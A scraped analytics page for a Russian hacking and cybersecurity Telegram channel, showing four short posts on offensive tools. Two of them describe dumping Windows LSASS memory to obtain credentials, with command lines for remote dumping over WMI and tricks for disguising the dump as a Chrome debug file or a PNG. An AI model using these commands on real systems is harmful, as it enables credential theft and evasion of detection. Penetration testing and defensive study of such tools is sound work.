Каталог каналов Новое Каналы в закладках Мои каналы Поиск постов Рекламные посты
Инструменты
Мониторинг Новое Детальная статистика Анализ аудитории Telegraph-статьи Бот аналитики
Полезная информация
Инструкция Telemetr Документация к API Чат Telemetr
Полезные сервисы
Защита от накрутки Создать своего бота Продать/Купить канал Монетизация

Не попадитесь на накрученные каналы! Узнайте, не накручивает ли канал просмотры или подписчиков Проверить канал на накрутку
Прикрепить Телеграм-аккаунт Прикрепить Телеграм-аккаунт

Телеграм канал «CYBERDEN | Хакинг и Кибербезопасность»

CYBERDEN | Хакинг и Кибербезопасность
140
201
3
1
213
🔸Лайфхаки
🔸Пентест (этичный хакинг)
🔸Секреты информационной безопасности
🔸Программирование
🔸Обучение

По любым вопросам: @rtdream
Курс по хакингу: https://cyberden.pw/kurs
Реклама: https://t.me/rtdream
Подписчики
Всего
3 439
Сегодня
-1
Просмотров на пост
Всего
356
ER
Общий
7.65%
Суточный
6.8%
Динамика публикаций
Telemetr - сервис глубокой аналитики
телеграм-каналов
Получите подробную информацию о каждом канале
Отберите самые эффективные каналы для
рекламных размещений, по приросту подписчиков,
ER, количеству просмотров на пост и другим метрикам
Анализируйте рекламные посты
и креативы
Узнайте какие посты лучше сработали,
а какие хуже, даже если их давно удалили
Оценивайте эффективность тематики и контента
Узнайте, какую тематику лучше не рекламировать
на канале, а какая зайдет на ура
Попробовать бесплатно
Показано 4 из 140 постов
Смотреть все посты
Пост от 14.10.2025 17:07
281
1
3
Impersonate Инструмент для манипуляций с токенами. Очень полезный инструмент в "копилочку" любого инфраструктурщика https://github.com/sensepost/impersonate
Изображение
Пост от 06.10.2025 21:30
432
0
11
Отличный гайд для тех, кто не знал, как подступиться к MS Exchange. В гайде разобраны основные техники и атаки на OWA и MS Exchange. https://pentestnotes.ru/notes/owa_pentest_guide/
Изображение
🍾 4
🔥 2
🌚 2
👍 1
Пост от 22.09.2025 13:05
352
0
3
И еще немного про LSASS. Можно выполнить дамп процесса удаленно, через WMI. Дамп процесса по PID: python wmi-proc-dump.py user:pass@hostname -pid 580 Дамп процесса по имени: python wmi-proc-dump.py user:pass@hostname -proc lsass.exe Сделать дамп процесса и переименовать: python wmi-proc-dump.py user:pass@hostname -proc lsass.exe -rename chrome-debug.dmp Сделать дамп процесса и загрузить файл дампа в текущий каталог: python wmi-proc-dump.py user:pass@hostname -proc lsass.exe -download https://github.com/0xthirteen/WMI_Proc_Dump
👍 3
Пост от 20.09.2025 20:46
427
0
6
WSASS Это инструмент, использующий старую программу WerfaultSecure.exe для создания дампа памяти процессов, таких как LSASS.EXE. Вывод осуществляется в формате Windows MINIDUMP. Этот инструмент автоматически заменяет заголовок "MDMP" на заголовок PNG. После завершения дампа необходимо восстановить исходный 4-байтовый заголовок в начале файла, используя исходные 4 байта: {0x4D, 0x44, 0x4D, 0x50} "MDMP". https://github.com/TwoSevenOneT/WSASS
Изображение
👍 3
1
Смотреть все посты